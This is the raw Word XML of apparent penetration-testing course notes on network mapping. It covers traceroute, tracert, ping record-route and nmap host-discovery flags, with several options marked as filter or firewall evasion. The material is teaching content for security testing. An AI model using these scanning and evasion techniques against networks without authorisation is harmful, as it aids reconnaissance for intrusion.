      <w:r w:rsidRPr="00E658EC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> by converting the 32 bit EIGRP metric to the 24 bit IGRP metric. Most of the routing optimizations are based on the Diffusing Update Algorithm (DUAL) work from SRI, which guarantees loop-free operation and provides a mechanism for fast convergence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRPr="0039512C" w:rsidRDefault="00E658EC" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Same issues as RIP2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00991A5D" w:rsidRDefault="00991A5D" w:rsidP="00E658EC">
      <w:pPr>
        <w:ind w:left="-360" w:firstLine="90"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRDefault="00E658EC" w:rsidP="00E658EC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>B4 - Network Mapping &amp; Target Identification</w:t>
      </w:r>
      <w:r w:rsidR="00991A5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRDefault="00E658EC" w:rsidP="00E658EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B4a - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3290">
        <w:t>Analysis of output from tools used to map the route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3290">
        <w:t>between the engagement point and a number of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> targets</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRPr="0017345B" w:rsidRDefault="00E658EC" w:rsidP="00E658EC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E658EC">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRPr="008B4568" w:rsidRDefault="00D72393" w:rsidP="008B4568">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00E658EC" w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>raceroute</w:t>
      </w:r>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Uses UDP by default but can use ICMP </w:t>
      </w:r>
      <w:r w:rsidR="008B4568" w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(echo request)</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host</w:t>
      </w:r>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>default</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–I</w:t>
      </w:r>
      <w:r w:rsidR="00270822">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Use ICMP echo request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4568" w:rsidRDefault="00D54D88"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–U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Do UDP with set destination</w:t>
      </w:r>
      <w:r w:rsidR="008B4568" w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> port to 53 (DNS)  - filter evasion</w:t>
      </w:r>
      <w:r w:rsidR="00270822">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (without –U port number would increment)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00270822" w:rsidRDefault="00270822"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–-sport </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>set source port (filter evasion)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54D88" w:rsidRDefault="00D54D88"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–p</w:t>
      </w:r>
      <w:r w:rsidR="00270822">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>set port for filter evasion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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–T</w:t>
      </w:r>
      <w:r w:rsidR="00D54D88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>use tcp packets</w:t>
      </w:r>
      <w:r w:rsidR="00D54D88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (set port for filter evasion)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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-6</w:t>
      </w:r>
      <w:r w:rsidR="00D54D88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">IPv6 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54D88" w:rsidRDefault="00D54D8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–F</w:t>
      </w:r>
      <w:r w:rsidR="00270822">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>tell router not to fragment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00270822" w:rsidRPr="008B4568" w:rsidRDefault="00D54D88" w:rsidP="00270822">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–g gw</w:t>
      </w:r>
      <w:r w:rsidR="00270822">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">source route options (see below B7) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRPr="008B4568" w:rsidRDefault="00E658EC" w:rsidP="00D54D88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tracert</w:t>
      </w:r>
      <w:r w:rsidR="008B4568" w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  - windows version</w:t>
      </w:r>
      <w:r w:rsidR="00270822">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (although there is an alias on Mint Linux)</w:t>
      </w:r>
      <w:r w:rsidR="008B4568" w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> using ICMP echo requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRDefault="00E658EC" w:rsidP="00D54D88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B4568" w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – can be used with the record route option to enumerate hop details. The exiting interface address of each hop is usually recorded. Note that devices are required to record their route so entries maybe missing. Also limited to 9 hops so will not get all hop</w:t>
      </w:r>
      <w:r w:rsidR="00D54D88">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="008B4568" w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> for larger hop </w:t>
      </w:r>
      <w:r w:rsidR="00D54D88">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">count </w:t>
      </w:r>
      <w:r w:rsidR="008B4568" w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>distances</w:t>
      </w:r>
      <w:r w:rsidR="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D54D88" w:rsidRDefault="00D54D88" w:rsidP="00D54D88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D54D88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D54D88">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –r 9 host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRDefault="0039512C" w:rsidP="00D54D88">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRDefault="0039512C" w:rsidP="0039512C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etrace</w:t>
      </w:r>
      <w:r w:rsidRPr="008B4568">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DaveA’s tools that does everything tracerouteish.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039512C" w:rsidRPr="008B4568" w:rsidRDefault="0039512C" w:rsidP="0039512C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="357"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039512C">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>SHOW EXAMPLES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E658EC" w:rsidRDefault="00E658EC" w:rsidP="0017345B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B4b - </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3290">
        <w:t>Network sweeping techniques to prioritise a target list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B4568">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE3290">
        <w:t>the potential for false negatives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008836C1" w:rsidRDefault="008836C1" w:rsidP="008B4568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008836C1" w:rsidRDefault="00BF4AD3" w:rsidP="00A331E7">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A331E7" w:rsidRPr="00A331E7" w:rsidRDefault="00A331E7" w:rsidP="008B4568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A331E7">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="008836C1" w:rsidRPr="00E50EC3" w:rsidRDefault="005D71D2"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w:t>
      </w:r>
      <w:r w:rsidR="00BF4AD3" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-sn</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BF4AD3" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:r w:rsidR="00BF4AD3" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>es&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>default scan (</w:t>
      </w:r>
      <w:r w:rsidR="00BF4AD3" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP echo, TCP SYN 443, TCP ACK 80, and ICMP timestamp)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D71D2" w:rsidRPr="00E50EC3" w:rsidRDefault="00BF4AD3" w:rsidP="001A3021">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="6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-PS&lt;port list&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>TCP SYN to listed ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF4AD3" w:rsidRPr="00E50EC3" w:rsidRDefault="00BF4AD3"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-PA&lt;port list&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00885520" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>TCP ACK to listed ports (good to bypass simple firewalls that block SYN)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00885520" w:rsidRPr="00E50EC3" w:rsidRDefault="00BF4AD3"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w:t>
      </w:r>
      <w:r w:rsidR="00885520" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PU</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;port list&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00885520" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>UDP probe with default port 40125</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (good to bypass simple firewall</w:t>
      </w:r>
      <w:r w:rsidR="00885520" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>s that block TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00885520" w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ICMP errors or UDP response indicate live hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00885520" w:rsidRPr="00E50EC3" w:rsidRDefault="00885520" w:rsidP="001A3021">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-PE, -PP, -PM</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E50EC3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
